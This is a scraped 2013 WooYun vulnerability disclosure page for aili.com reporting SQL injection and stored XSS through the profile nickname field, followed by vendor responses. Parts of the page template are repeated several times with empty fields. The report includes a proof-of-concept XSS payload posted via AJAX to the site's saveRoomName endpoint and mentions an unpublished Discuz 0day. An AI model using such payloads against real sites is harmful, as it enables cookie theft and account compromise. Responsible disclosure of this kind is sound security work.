爱丽网SQL注射加存储型XSS | wooyun-2013-026398| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-026398

漏洞标题：爱丽网SQL注射加存储型XSS

漏洞作者： random_

提交时间：2013-06-20 12:20

修复时间：2013-08-04 12:21

公开时间：2013-08-04 12:21

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-06-20：细节已通知厂商并且等待厂商处理中
2013-06-20：厂商已经确认，细节仅向厂商公开
2013-06-30：细节向核心白帽子及相关领域专家公开
2013-07-10：细节向普通白帽子公开
2013-07-20：细节向实习白帽子公开
2013-08-04：细节向公众公开

简要描述：

注入+两个存储，要20
吐槽：上次给我送了瓶护肤霜，哥不洗脸的人要那个干啥

详细说明：

1. 上次http://wooyun.org/bugs/wooyun-2013-026152，有人回复对爱丽网进行了注射加强，这次试确实过滤了一些关键字，但注射是有的，在个人空间，昵称处就有单引号的报错，同时导致存储xss
编辑昵称的长度可以客户端突破
具体
http://member.aili.com/p/xxoo13

var roomName = "'<embed/src=/><svg onload=alert(document.cookie)>";
                    $("#roomName").text("");
                    $.ajax({
                        'url':'http://member.aili.com/index.php?c=member&m=room&a=saveRoomName',
                        'type':'POST',
                        'data':'roomName='+roomName,
                        success:function(data){
                            if(data=='1'){
                                $("#roomName").text(roomName);
                            } else {
                                alert("更新失败");
                            }
                        } });

2.这个是dz的0day，今天刚挖的，爱丽也中招，细节不解释，等dz出补丁，希望你们注意
ie等浏览器：http://bbs.aili.com/space-uid-1038928.html

漏洞证明：

修复方案：

参数控制

版权声明：转载请注明来源 random_@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-06-20 14:28

厂商回复：

@random_ 漏洞收了，挺能挖，期待挖出更多的漏洞. 不愿意要护肤霜给你发别的..

漏洞评价：

2013-06-20 17:47 | 爱丽网(乌云厂商)

@random_ DZ 0day漏洞已修复，求测.
2013-06-20 21:15 | random_ ( 普通白帽子 | Rank:295 漏洞数:50 | 推动开源推动网络安全)

@爱丽网爱丽网是令人尊敬的厂商，不吝啬，响应快，懂白帽子的心。但是dz的洞依然在，我重新注册的号测试的。
2013-06-21 15:33 | 爱丽网(乌云厂商)

@random_ [抱拳] DZ0day漏洞测试辛苦啦！
2013-06-22 11:12 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

@random_ @爱丽网你们是在交易么？- -#
2013-06-22 12:42 | random_ ( 普通白帽子 | Rank:295 漏洞数:50 | 推动开源推动网络安全)

@zzR 交易啥子~~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-026398

漏洞标题：爱丽网SQL注射加存储型XSS

相关厂商：aili.com

漏洞作者： random_

提交时间：2013-06-20 12:20

修复时间：2013-08-04 12:21

公开时间：2013-08-04 12:21

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 random_@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-026398

漏洞标题：爱丽网SQL注射加存储型XSS

相关厂商：aili.com

漏洞作者： random_

提交时间：2013-06-20 12:20

修复时间：2013-08-04 12:21

公开时间：2013-08-04 12:21

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-026398"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 random_@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：